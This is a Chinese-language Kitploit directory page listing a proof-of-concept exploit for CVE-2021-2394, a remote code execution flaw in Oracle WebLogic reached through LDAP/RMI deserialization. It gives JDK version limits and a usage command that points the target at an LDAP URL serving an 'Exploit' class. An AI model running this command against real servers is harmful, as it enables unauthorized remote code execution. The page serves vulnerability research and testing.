Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-2394 — 针对 CVE-2021-2394 的概念验证漏洞利用,这是 Oracle WebLogic Server 中的一个远程代码执行漏洞。利用 LDAP 或 RMI 反序列化来传递有效载荷。 | Kitploit
工具/GitHubGitHub/lz2y/cve-2021-2394
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHublz2y/cve-2021-2394

CVE-2021-2394

针对 CVE-2021-2394 的概念验证漏洞利用,这是 Oracle WebLogic Server 中的一个远程代码执行漏洞。利用 LDAP 或 RMI 反序列化来传递有效载荷。

查看仓库
402014年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-2394

POC of CVE-2021-2394

  • 免责声明
    • 项目仅供学习使用,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责
  • 注意事项

    • POC使用IIOP发包,请添加相关依赖(已将12.2.1.3.0版本的依赖放release)
    • 请使用低版本的jdk安装weblogic进行测试

      基于RMI的利用方式,JDK版本限制于6u132、7u131、8u121之前,在8u122及之后的版本中,加入了反序列化白名单的机制,关闭了RMI远程加载代码 基于LDAP的利用方式,JDK版本限制于6u211、7u201、8u191、11.0.1之前,在8u191版本中,Oracle对LDAP向量设置限制,发布了CVE-2018-3149,关闭JNDI远程类加载 From:https://www.freebuf.com/vuls/279465.html

    • 在虚拟机环境中无法复现可参考https://xz.aliyun.com/t/7498
  • 使用方法:

    • 启动一个ldap服务
    • java -jar CVE_2021_2394.jar rhost rport ldapurl
    • eg:java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit
  • 参考链接:

    • https://mp.weixin.qq.com/s/onoMpyenDkMmsoGEw8VO2A
    • https://github.com/Y4er/CVE-2020-14756
    • https://github.com/Y4er/CVE-2020-2551
  • 更新

    • 2021/8/15 删除一些不必要的代码
  • 分析文章

    • https://mp.weixin.qq.com/s/AxJJxbkclr4ijXX8lpNAfw
下载工具